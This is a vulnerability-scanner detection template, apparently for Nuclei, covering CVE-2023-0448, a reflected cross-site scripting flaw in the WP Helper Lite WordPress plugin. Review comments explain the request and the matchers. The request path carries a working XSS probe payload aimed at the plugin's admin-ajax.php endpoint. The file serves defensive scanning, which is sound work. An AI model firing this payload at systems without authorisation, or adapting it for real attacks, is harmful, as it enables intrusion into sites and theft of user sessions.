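# Detection template for CVE-2023-0448: reflected cross-site scripting in the
# WP Helper Lite WordPress plugin (versions < 4.3).
# It sends a single GET request and reports a match only when the probe string
# comes back unencoded inside an HTML response (see the matchers below).
id: CVE-2023-0448

info:
  name: WP Helper Lite < 4.3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  # A match means the installed plugin predates the fix; upgrading is the only
  # remediation this template records.
  remediation: Fixed in version 4.3 and above
  reference:
    - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0448
  classification:
    # UI:R / S:C in the vector: the victim has to open a crafted link, and the
    # script then runs in the victim's browser rather than on the server.
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0448
    cwe-id: CWE-79
    # EPSS values are as recorded in this template; presumably a snapshot from
    # when it was written - re-check before using them for prioritisation.
    epss-score: 0.00078
    epss-percentile: 0.32657
    # NOTE(review): cpe and product name "wp_helper_premium", while name, tags
    # and publicwww-query refer to "wp-helper-lite" - confirm against the NVD
    # CPE record before relying on this field for asset matching.
    cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # One HTTP request per target.
    max-request: 1
    vendor: matbao
    product: wp_helper_premium
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-helper-lite"
  tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao

http:
  # The request sets no cookies or login step. It calls admin-ajax.php with
  # action=surveySubmit and puts a URL-encoded marker in the extra parameter "a".
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"

    # All four expressions must hold (condition: and):
    #   1. the endpoint answered 200;
    #   2. the response headers mention text/html, so a browser would treat the
    #      body as markup;
    #   3. the marker appears in the body decoded and unescaped, i.e. the
    #      parameter was echoed without output encoding;
    #   4. the body contains the `params":{"action` fragment - presumably the
    #      plugin's echo of the request parameters, which keeps unrelated pages
    #      that merely reflect input from matching (confirm against a known
    #      vulnerable response).
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "><svg onload=alert(document.domain)>")'
          - 'contains(body, "params\":{\"action")'
        condition: and
# NOTE(review): this digest was issued for the original template text;
# presumably it no longer verifies once the file is edited (added comments
# included) - re-sign the template before distributing a modified copy.
# digest: 4a0a0047304502203284fa2cd4c61cd46c8ec4611d74232f7b04c464e0e99ba5bf7aa071e2f14ed1022100c373dec5f126a4152956472ee5cb773bed0a9846dc99b5d804ad582758b98a7c:922c64590222798bb761d5b6d8e72950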